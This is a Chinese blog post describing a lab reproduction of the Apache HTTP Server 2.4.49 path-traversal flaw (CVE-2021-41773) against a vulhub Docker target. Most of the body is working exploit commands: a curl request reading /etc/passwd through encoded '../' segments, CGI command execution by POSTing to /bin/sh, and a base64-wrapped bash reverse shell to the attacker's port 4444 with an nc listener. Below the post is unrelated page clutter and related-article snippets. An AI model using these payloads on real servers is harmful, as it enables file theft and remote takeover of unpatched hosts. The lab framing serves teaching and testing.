Apache HTTP Server 2.4.49 路径穿越漏洞复现及利用

已于 2022-07-26 18:27:26 修改
阅读量3.1k 收藏 11
点赞数 6
文章标签: apache 网络安全 web安全
于 2022-07-23 16:01:49 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Tauil/article/details/125946883
版权

漏洞介绍

Apache HTTP Server是Apache基金会开源的一款流行的HTTP服务器。在其2.4.49版本中,引入了一个路径穿越漏洞,满足下面两个条件的Apache服务器将会受到影响:

  • 版本等于2.4.49
  • 穿越的目录允许被访问,比如配置了 <Directory/ >Require all granted < /Directory> 。(默认情况下是不允许的)

攻击者利用这个漏洞,可以读取位于Apache服务器Web目录以外的其他文件,或者读取Web目录中的脚本文件源码,或者在开启了cgi或cgid的服务器上执行任意命令。

Apache HTTP Server 2.4.49 路径穿越漏洞复现

准备一台装载有vulhububuntu,以及一台攻击机kali,靶机进入vulhub文件夹,直接就是一套丝滑连招

cd httpd/CVE-2021-41773
sudo docker-compose build
sudo docker-compose up -d

然后访问http:靶机IP:8080他就会告诉你他现在很正常,你可以开始乱搞了嗷。

这个咱也没见过大世面,这个界面干干净净的大家都很懵逼,就连f12也没有发现其他目录请求包,那么咱们又得借助一点小工具啦。嗷,直接打开御剑,把网站放上去好好检查检查

在这里插入图片描述
当然嗷,可能有些人扫不出来,扫不出来很正常,因为你的爆破本里没有这个目录所以扫不出来,这个爆破本都是自己一路走来积累的东西,概不外传嗷。发现了这个目录后我们就访问查看,就会发现这里的每个文件都能执行查看,那别说了,八成是配置了 <Directory/ >Require all granted < /Directory> ,就是上面说的,那么就可以通过这个进行目录穿越,从而导致隐私泄露
在这里插入图片描述

构造恶意访问URLhttp://靶机IP:8080/icons/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd,直接用浏览器访问发现请求的数据包会把咱们的前面那一串给过滤掉了

在这里插入图片描述所以我们打开burpsuite进行抓包,然后修改URL为/icons/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd,最终也是成功查看到了靶机的etc/passwd文件。当然也可以使用kali的curl命令,输入curl -v --path-as-is http://靶机IP:8080/icons/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd即可

在这里插入图片描述到下一步我们就可以利用该目录穿越漏洞查看其apache服务器是否启用了CGI,什么是CGI?

公共网关接口(Common Gateway Interface,CGI)是Web 服务器运行时外部程序的规范,按CGI 编写的程序可以扩展服务器功能。CGI 应用程序能与浏览器进行交互,还可通过数据API与数据库服务器等外部数据源进行通信,从数据库服务器中获取数据。格式化为HTML文档后,发送给浏览器,也可以将从浏览器获得的数据放到数据库中。几乎所有服务器都支持CGI

具体可以看这里嗷https://www.jianshu.com/p/7ad0d73bbd5b,如果他启用了的话,我们就可以利用它来执行我们的服务器命令语句,当配置了CGI时一般就会在web目录下存在一个名为cgi-bin的文件夹,话不多说,修改URL为/icons/%2e%2e/cgi-bin,发现返回了301,那就说明该目录存在

在这里插入图片描述直接curl命令,攻击机中输入 //检查字符是否为英文

curl -v --data “echo;ls” ‘http://靶机IP:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh’

这里是引用

查看可以使用的命令,可以看到里面可以使用touch命令,所以我们就拿他来试试看,输入命令 //检查字符是否为英文

curl -v --data “echo;touch /tmp/hacker” ‘http://靶机IP:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh’

然后到靶机中输入

sudo docker ps //记住你使用端口容器ID,记前两位就行
sudo docker exec -it 容器ID bash //用前两位就行
ls /tmp

就可以看到我们输入的命令执行成功了

在这里插入图片描述

Apache HTTP Server 2.4.49 路径穿越漏洞利用

刚刚的命令中我们可看到了当前用户还能使用bash命令,那么我们就可以构造反弹shell命令连接目标靶机

bash -i >& /dev/tcp/攻击机机ip/4444 0>&1

然后还得将该命令进行base64编码,形成

bash -c ‘{echo,你的base64编码值}|{base64,-d}|{bash,-i}’

再另启一个终端,输入

nc -lvvp 4444

回到原终端输入命令 //检查字符是否为英文

curl -v --data “echo;bash -c ‘{echo,你的base64编码值}|{base64,-d}|{bash,-i}’” ‘http://靶机IP:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh’

然后就能连接上目标靶机了
在这里插入图片描述

Tauil
关注
  • 6
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Apache 2.4.49 路径穿越漏洞复现 ( CVE-2021-41773 )
qq_45396375的博客
01-04 573
Apache HTTP Server 2.4.49版本中存在一处路径穿越漏洞(CVE-2021-41773)如果配置了Require all granted,远程攻击者可以使用路径遍历攻击访问易受攻击的Web服务器上文档根目录以外的任意文件;如果Apache HTTP Server 2.4.49开启了CGI,攻击者还可构造恶意请求实现远程代码执行。
部分CVE复现Web(1)
qq_66013948的博客
06-17 924
​ 首先,先来看一下这个漏洞的官方描述:​ CVE-2021-41773 是在 Apache HTTP Server 2.4.49 中对路径规范化所做的更改中发现了一个缺陷。攻击者可以使用路径遍历攻击将 URL 映射到预期文档根目录之外的文件,如果文档根目录之外的文件不受“要求全部拒绝”的保护,则这些请求可能会成功,如果还为这些别名路径启用了 CGI 脚本,则可以允许远程代码执行。
Apache HTTP Server 2.4.49 路径穿越漏洞(CVE-2021-41773)
weixin_45366453的博客
07-21 790
Apache HTTP Server 2.4.49 路径穿越漏洞(CVE-2021-41773)
Apache HTTP Server 2.4.50 路径穿越漏洞(CVE-2021-42013)
weixin_44047654的博客
12-07 729
Apache HTTP Server 2.4.50 路径穿越漏洞(CVE-2021-42013)
CVE-2021-41773 Apache2.4.49路径穿越漏洞复现
Vitaminapple的博客
10-09 2298
CVE-2021-41773 Apache2.4.49路径穿越漏洞复现 1. 环境搭建 (1) 下载Apache2.4.49版本镜像 $ docker pull httpd:2.4.49 查看镜像是否正确下载 $ docker images (2)启动镜像 $ docker run -d -P 391841fe5284 查看启动镜像的容器,可查看映射的端口和容器ID $ docker ps (3)进入容器 $ docker exec -it 605eb3979ca0 /bin/bash 修改http
Apache HTTP Server 2.4.50 路径穿越漏洞(CVE-2021-42013)
weixin_47311099的博客
12-07 2281
Apache HTTP Server 2.4.50 路径穿越漏洞(CVE-2021-42013) Apache官方在2.4.50版本中对2.4.49版本中出现的目录穿越漏洞CVE-2021-41773进行了修复,但这个修复是不完整的,CVE-2021-42013是对补丁的绕过。 攻击者利用这个漏洞,可以读取位于Apache服务器Web目录以外的其他文件,或者读取Web目录中的脚本文件源码,或者在开启了cgi或cgid的服务器上执行任意命令。 这个漏洞可以影响Apache HTTP Server 2.4.49
Apache HTTP Server 2.4.49 路径穿越漏洞 (CVE-2021-41773)
weixin_42786460的博客
09-25 852
Apache HTTP Server 2.4.49 路径穿越漏洞 (CVE-2021-41773)
Apache HTTP Server 2.4.49 路径穿越与命令执行漏洞(CVE-2021-41773)
weixin_44047654的博客
12-07 394
Apache HTTP Server 2.4.49 路径穿越与命令执行漏洞(CVE-2021-41773)
漏洞复现】CVE-2021-41773 Apache HTTP Server 2.4.49 路径穿越漏洞
m0_53121608的博客
07-13 145
漏洞复现】CVE-2021-41773 Apache HTTP Server 2.4.49 路径穿越漏洞
vulhub-Apache HTTP Server 2.4.50 路径穿越漏洞(CVE-2021-42013)复现
m0_58265086的博客
09-09 125
Apache 披露了一个在 Apache HTTP Server 2.4.49 上引入的漏洞,称为 CVE-2021-41773。同时发布了2.4.50更新,修复了这个漏洞Apache HTTP Server(简称 Apache)是开源的 Web 服务器,可以在大多数计算机操作系统中运行,由于其多平台和安全性被广泛使用,是最流行的 Web 服务器端软件之一。-2021-41773修复不够完善,攻击者可利用漏洞绕过修复补丁,并利用目录穿越攻击访问服务器中一些文件,进而造成敏感信息泄露。
apache 2.4.x http server x64.zip 下载
03-12
VisualSVN Server 添加自助修改密码页面所需的文件,解压后,从里面提取一个文件 htpasswd.exe 放到:C:\Program Files\VisualSVN Server\bin\htpasswd.exe
Apache HttpServer 2.4.X 和tomcat连接器
05-07
Apache HttpServer 2.4.X 与 Tomcat 连接器是将 Apache HTTP 服务器与 Tomcat 应用服务器集成的关键组件。这个连接器,通常称为 mod_jk 或 ajp (Apache Jserv Protocol),允许两个服务协同工作,使得 Apache 能够...
apache目前最新版本(apache2.4.43)
08-10
1. 安全性更新:Apache 2.4.43修复了多个安全漏洞,这些漏洞可能被攻击者利用来执行任意代码、泄露敏感信息或者进行拒绝服务攻击。定期更新到最新版本是确保网站安全的重要步骤。 2. 性能优化:新版本通常会带来...
apache-httpd-2.4.58-win64-VS17.zip
12-15
标题 "apache-httpd-2.4.58-win64-VS17.zip" 指的是 Apache HTTP 服务器的2.4.58版本,适用于64位Windows操作系统,并且是使用Visual Studio 2017编译的。这个压缩包包含了一系列用于在Windows平台上搭建和运行...
httpd-2.4.49-o111l-x64-vc15.zip
11-23
- **安全注意事项**: 安装后应立即更新Apache到最新安全补丁,防止已知漏洞利用。 - **日志管理**: Apache的日志文件默认位于“logs”目录下,包括访问日志和错误日志,可用于监控和调试。 - **模块化结构**: ...
Apache2 Ubuntu-XXE漏洞渗透
weixin_53736204的博客
07-25 517
只知道他在192.168.30.1-192.168.255之间,然后御剑2014端口扫描去扫描IP,发现IP为192.168.30.128是有响应。因为我们用的net模式,我们可以在本机通过ip来访问他的网站,但我们不知道他分配是哪个ip。打开robots.txt看看有什么东西,看见有/xxe目录,还有给admin.php。解码后,发现用户名密码,用户名:administhebest,密码是加密过的。我们构造xxe语句将&xxe;我们试一下xxe发现发现一个新网页,是/xxe/index.php。
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8359
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
网络安全自学从入门到精通的制胜攻略!!!
最新发布
2301_77160226的博客
07-27 259
在信息时代,网络安全已成为至关重要的领域。越来越多的人希望通过自学掌握这门技术,开启充满挑战与机遇的职业道路。
批判的Apache 2.4.x < 2.4.56 多个漏洞
06-11
Apache 2.4.x < 2.4.56 的多个漏洞主要包括以下几个方面: 1. HTTP/2 相关漏洞Apache 2.4.20 至 2.4.39 版本中存在一个 HTTP/2 相关漏洞,攻击者可以通过发送恶意请求导致服务拒绝或者服务器崩溃。 2. mod_proxy 相关漏洞Apache 的 mod_proxy 模块存在多个漏洞,攻击者可以利用这些漏洞进行 SSRF 攻击、反射型 XSS 攻击、代理欺骗等攻击。 3. mod_ssl 相关漏洞Apache 的 mod_ssl 模块存在多个漏洞,攻击者可以利用这些漏洞进行 DoS 攻击、泄露敏感信息等攻击。 4. mod_rewrite 相关漏洞Apache 的 mod_rewrite 模块存在多个漏洞,攻击者可以利用这些漏洞进行拒绝服务攻击、绕过访问控制等攻击。 总之,如果你使用的是 Apache 2.4.x < 2.4.56 版本,建议尽快升级到最新版本,以免受到攻击。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值